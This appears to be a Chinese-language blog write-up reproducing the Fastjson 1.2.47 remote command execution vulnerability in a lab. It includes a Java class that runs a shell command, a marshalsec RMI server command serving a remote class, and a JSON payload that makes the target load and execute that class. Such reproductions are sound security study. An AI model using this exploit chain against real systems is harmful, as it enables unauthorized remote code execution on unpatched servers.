joker0xxx3's Blog

现实告诉我：保持好奇心，享受孤独

Fastjson 1.2.47 远程命令执行漏洞

发表于 2021-07-21 | 分类于漏洞复现 |

Fastjson 1.2.47 远程命令执行漏洞

Fastjson是阿里巴巴公司开源的一款json解析器，其性能优越，被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单，而在1.2.48以前的版本中，攻击者可以利用特殊构造的json字符串绕过白名单检测，成功执行任意命令。

参考链接：

漏洞复现

环境启动后，访问http://192.168.44.132:8090即可看到一个json对象被返回，我们将content-type修改为application/json后可向其POST新的JSON对象，后端会利用fastjson进行解析。

首先编译并上传命令执行代码，如http://192.168.44.132/TouchFile.class：

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

然后我们借助marshalsec项目，启动一个RMI服务器，监听9999端口，并制定加载远程类TouchFile.class：

1	java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.44.132/#TouchFile" 9999

向靶场服务器发送Payload：

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.44.132:9999/TouchFile",
        "autoCommit":true
    }
}

可见，命令touch /tmp/success已成功执行：

本文作者： joker0xxx3
本文链接： http://joker-vip.github.io/2021/07/21/Fastjson%201.2.47%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
版权声明： 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 3.0 许可协议。转载请注明出处！

0%